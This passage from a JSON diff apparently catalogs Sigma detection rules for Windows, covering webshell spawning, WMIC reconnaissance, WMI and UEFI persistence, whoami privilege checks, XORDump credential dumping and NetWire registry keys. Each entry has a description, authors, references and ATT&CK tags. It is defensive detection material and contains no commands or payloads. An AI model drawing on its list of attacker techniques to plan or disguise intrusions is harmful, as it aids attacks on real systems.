"https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", + "value": "Webshell Recon Detection Via CommandLine & Processes" + }, + { + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "meta": { + "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Particular web applications may spawn a shell process legitimately" + ], + "filename": "proc_creation_win_webshell_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1190" + ] + }, + "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", + "value": "Shells Spawned by Web Servers" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ ], + "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "value": "Usage Of Web Request Commands And Cmdlets" + }, + { + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate usage of the utility by administrators to query the event log" + ], + "filename": "proc_creation_win_wevtutil_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "value": "Wevtutil Recon" + }, + { + "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_whoami_as_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "value": "Run Whoami as Privileged User" + }, + { + "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "meta": { + "author": "Teymur Kheirkhabarov, Florian Roth", + "creation_date": "2019/10/23", + "falsepositive": [ + "Possible name overlap with NT AUHTORITY substring to cover all languages" + ], + "filename": "proc_creation_win_whoami_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", + "value": "Run Whoami as SYSTEM" + }, + { + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. 
This is often used after a privilege escalation attempt.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Administrative activity (rare lookups on current privileges)" + ], + "filename": "proc_creation_win_whoami_priv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "value": "Run Whoami Showing Privileges" + }, + { + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "meta": { + "author": "Olaf Hartong", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_win10_sched_task_0day.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" + ] + }, + "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" + }, + { + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/25", + "falsepositive": [ + "Other legitimate \"Windows Terminal\" profiles" + ], + "filename": "proc_creation_win_windows_terminal_susp_children.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/windowsterminalprofile.html", + "https://twitter.com/nas_bench/status/1550836225652686848", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence" + ] + }, + "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", + "value": "Suspicious WindowsTerminal Child Processes" + }, + { + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "meta": { + "author": "Georg Lauenstein", + "creation_date": "2022/09/19", + "falsepositive": [ + "Other programs that use the same command line flags" + ], + "filename": "proc_creation_win_winpeas_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/carlospolop/PEASS-ng", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" + ] + }, + "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "value": "Detect Execution of winPEAS" + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ ], + "filename": "proc_creation_win_win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", + "value": "MSExchange Transport Agent Installation" + }, + { + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_computersystem_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "value": "Suspicious Get ComputerSystem Information with WMIC" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + 
"filename": "proc_creation_win_wmic_group_recon.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", + "value": "Suspicious Get Local Groups Information with WMIC" + }, + { + "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_hotfix_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "value": "WMIC Hotfix Recon" + }, + { + "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_reconnaissance.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "221b251a-357a-49a9-920a-271802777cc0", + "value": "Suspicious WMI Reconnaissance" + }, + { + "description": "An adversary might use WMI to execute commands on a remote system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", + "value": "WMI Remote Command Execution" + }, + { + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_service.yml", + "level": "medium", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", + "value": "WMI Reconnaissance List Remote Services" + }, + { + "description": "Uninstall an application with wmic", + "meta": { + "author": "frac113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remove_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "value": "WMI Uninstall An Application" + }, + { + "description": "Detects usage of wmic to start or stop a service", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + 
}, + "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "value": "WMIC Service Start/Stop" + }, + { + "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "value": "WMIC Unquoted Services Path Lookup" + }, + { + "description": "Detects wmiprvse spawning processes", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "value": "Wmiprvse Spawning Process" + }, + { + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "meta": { + "author": 
"Florian Roth", + "creation_date": "2019/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "value": "WMI Backdoor Exchange Transport Agent" + }, + { + "description": "Detects WMI script event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "value": "WMI Persistence - Script Event Consumer" + }, + { + "description": "Detects WMI spawning a PowerShell process", + "meta": { + "author": "Markus Neis / @Karneades", + "creation_date": "2019/04/03", + "falsepositive": [ + "AppvClient", + "CCM" + ], + "filename": "proc_creation_win_wmi_spwns_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "value": "WMI Spawning Windows PowerShell" + }, + { + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "meta": { + "author": "Nik Seetharaman, frack113", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate MWC use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_workflow_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" + ] + }, + "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", + "value": "Microsoft Workflow Compiler" + }, + { + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "proc_creation_win_wpbbin_persistence.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", + "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + }, + { + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "meta": { + "author": "Sreeman", + "creation_date": "2021/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "value": "Write Protect For Storage Disabled" + }, + { + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Rare legitimate inline scripting by some administrators" + ], + "filename": "proc_creation_win_wscript_shell_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", + "value": "Wscript Shell Run In CommandLine" + }, + { + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wsudo_susp_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/M2Team/Privexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" + ] + }, + "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "value": "Wsudo Suspicious Execution" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "value": "Wusa Extracting Cab Files" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.echotrail.io/insights/search/wusa.exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "value": "Wusa Extracting Cab Files From Suspicious Paths" + }, + { + "description": "Detects suspicious use of 
XORDump process memory dumping utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Another tool that uses the command line switches of XORdump" + ], + "filename": "proc_creation_win_xordump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/audibleblink/xordump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "value": "XORDump Use" + }, + { + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" + ], + "filename": "proc_creation_win_xsl_script_processing.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "value": "XSL Script Processing" + }, + { + "description": "Raw disk access using illegitimate tools, possible defence 
evasion", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "level": "low", + "logsource.category": "raw_access_thread", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools" + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "filename": "registry_add_amsi_providers_persistence.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers" + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": 
"registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" + ] + }, + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "meta": { + "author": "Christopher Peacock", + "creation_date": "2021/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_mal_netwire.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + 